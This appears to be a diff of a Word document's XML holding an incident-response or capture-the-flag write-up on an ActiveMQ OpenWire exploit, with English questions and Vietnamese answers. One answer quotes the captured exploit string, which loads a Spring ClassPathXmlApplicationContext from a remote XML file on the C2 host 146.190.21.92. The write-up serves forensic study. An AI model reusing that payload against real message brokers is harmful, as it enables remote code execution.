+        <w:t>contain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>breach</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>prevent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>further</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>data</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exfiltration</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the C2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>communicated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Từ việc thu thập gói, chúng ta có thể thấy IP đã giao tiếp với dịch vụ bằng </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>OpenWire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Ngoài ra, chúng ta có thể thấy IP gửi lệnh </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>OpenWire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Exception</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Response</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) để kích hoạt khai thác để khởi tạo một đối tượng của lớp để tải một đối tượng </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>bean</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> được định nghĩa bởi XML tại .</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>146.190.21.920x1Forg.springframework.context.support.ClassPathXmlApplicationContexthttp://146.190.21.92:8000/invoice.xml</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
@@ -328,10 +1463,10 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C87545" wp14:editId="2D8F8E21">
-            <wp:extent cx="5943600" cy="3147060"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1983625933" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0435A6" wp14:editId="41981246">
+            <wp:extent cx="5943600" cy="3178175"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="107938026" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -339,11 +1474,1622 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1983625933" name=""/>
+                    <pic:cNvPr id="107938026" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3178175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1D200D" wp14:editId="04311DD4">
+            <wp:extent cx="5943600" cy="3176270"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="1039013713" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1039013713" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3176270"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Initial</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>entry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>points</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>are</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>critical</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>trace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>back</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
